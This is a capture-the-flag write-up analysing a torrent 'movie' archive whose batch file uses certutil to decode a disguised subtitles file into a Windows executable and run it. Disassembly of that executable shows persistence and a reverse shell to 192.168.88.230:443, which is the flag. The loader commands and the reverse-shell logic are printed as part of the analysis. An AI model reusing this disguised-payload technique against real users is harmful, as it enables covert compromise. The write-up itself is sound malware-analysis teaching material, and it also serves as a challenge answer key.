Cool Video (Smart Home, 150p)

A friend asks for help with recent movie that was downloaded from torrents: something is wrong with player.
The video is available at Horror_stories_2k21-720p.zip
What is the address of C&C of the malware?
The answer is expected in usual format for an Internet address - <IP>:<PORT>

solution

Archive contains a lot more that just video file. 

 # 7z -ba l Horror_stories_2k21-720p.zip
2021-08-25 07:48:57 D....            0            0  Horror_stories_2k21-720p
2021-08-24 07:50:02 .....      7689166       119207  Horror_stories_2k21-720p/Horror_stories_2k21-720p.mp4
2021-08-24 07:50:24 .....          197          157  Horror_stories_2k21-720p/Readme.txt
2021-08-25 07:48:46 .....       231240        58479  Horror_stories_2k21-720p/Subtitles.srt
2021-08-24 07:42:28 .....         1649          676  Horror_stories_2k21-720p/Video_stream_fix_VLC_K-lite_codecs_pack.bat

Readme.txt suggests to run Video_stream_fix_VLC_K-lite_codecs_pack.bat, but it is malicious. It converts Subtitles.srt to binary format and executes it. 

certutil -decodehex -f Subtitles.srt Subtitles_tmp.srt

start Subtitles_tmp.srt

Converting Substitles.srt the same way as Windows's certutil, creates MS-DOS EXE file. 

# cat Subtitles.srt | cut -c6-53 | xxd -r -p > Subtitles.exe
# file Subtitles.exe
Subtitles.exe: PE32 executable (console) Intel 80386, for MS Windows

Reversing _main function with radare2 reveals C&C address. 

# r2 -A Subtitles.exe
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Finding and parsing C++ vtables (avrr)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information (aanr)
[x] Integrate dwarf function information.
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x004012e0]> pdf @ sym._main
            ; CALL XREF from fcn.004011b0 @ 0x401283
┌ 147: int sym._main (char **argv);
│           ; arg char **argv @ ebp+0x8
│           ; arg char **envp @ ebp+0xc
│           ; var int32_t var_4h @ esp+0x4
│           ; var int32_t var_19h @ esp+0x19
│           ; var int32_t var_1dh @ esp+0x1d
│           ; var int32_t var_21h @ esp+0x21
│           ; var int32_t var_25h @ esp+0x25
│           ; var int32_t var_27h @ esp+0x27
│           ; var int32_t var_28h @ esp+0x28
│           ; var int32_t var_2ch @ esp+0x2c
│           0x00401846      55             push ebp
│           0x00401847      89e5           mov ebp, esp
│           0x00401849      83e4f0         and esp, 0xfffffff0
│           0x0040184c      83ec30         sub esp, 0x30
│           0x0040184f      e89c060000     call sym.___main
│           0x00401854      e807fcffff     call sym HideConsole()      ; sym.HideConsole__
│           0x00401859      e823fcffff     call sym Persistence()      ; sym.Persistence__
│           0x0040185e      837d0803       cmp dword [argv], 3
│       ┌─< 0x00401862      752e           jne 0x401892
│       │   0x00401864      8b450c         mov eax, dword [envp]
│       │   0x00401867      83c008         add eax, 8
│       │   0x0040186a      8b00           mov eax, dword [eax]
│       │   0x0040186c      890424         mov dword [esp], eax        ; const char *str
│       │   0x0040186f      e884270000     call sym._atoi              ; int atoi(const char *str)
│       │   0x00401874      8944242c       mov dword [var_2ch], eax
│       │   0x00401878      8b450c         mov eax, dword [envp]
│       │   0x0040187b      83c004         add eax, 4
│       │   0x0040187e      8b00           mov eax, dword [eax]
│       │   0x00401880      8b54242c       mov edx, dword [var_2ch]
│       │   0x00401884      89542404       mov dword [var_4h], edx
│       │   0x00401888      890424         mov dword [esp], eax
│       │   0x0040188b      e8d9fcffff     call sym RunShell(char*, int) ; sym.RunShell_char__int_
│      ┌──< 0x00401890      eb40           jmp 0x4018d2
│      ││   ; CODE XREF from sym._main @ 0x401862
│      │└─> 0x00401892      c74424193139.  mov dword [var_19h], 0x2e323931 ; '192.'
│      │                                                               ; [0x2e323931:4]=-1
│      │    0x0040189a      c744241d3136.  mov dword [var_1dh], 0x2e383631 ; '168.'
│      │                                                               ; [0x2e383631:4]=-1
│      │    0x004018a2      c74424213838.  mov dword [var_21h], 0x322e3838 ; '88.2'
│      │                                                               ; [0x322e3838:4]=-1
│      │    0x004018aa      66c744242533.  mov word [var_25h], 0x3033  ; '30'
│      │                                                               ; [0x3033:2]=0xffff
│      │    0x004018b1      c644242700     mov byte [var_27h], 0
│      │    0x004018b6      c7442428bb01.  mov dword [var_28h], 0x1bb  ; [0x1bb:4]=-1 ; 443
│      │    0x004018be      8b442428       mov eax, dword [var_28h]
│      │    0x004018c2      89442404       mov dword [var_4h], eax
│      │    0x004018c6      8d442419       lea eax, [var_19h]
│      │    0x004018ca      890424         mov dword [esp], eax
│      │    0x004018cd      e897fcffff     call sym RunShell(char*, int) ; sym.RunShell_char__int_
│      │    ; CODE XREF from sym._main @ 0x401890
│      └──> 0x004018d2      b800000000     mov eax, 0
│           0x004018d7      c9             leave
└           0x004018d8      c3             ret

Flag is 192.168.88.230:443.

Buy Me A Coffee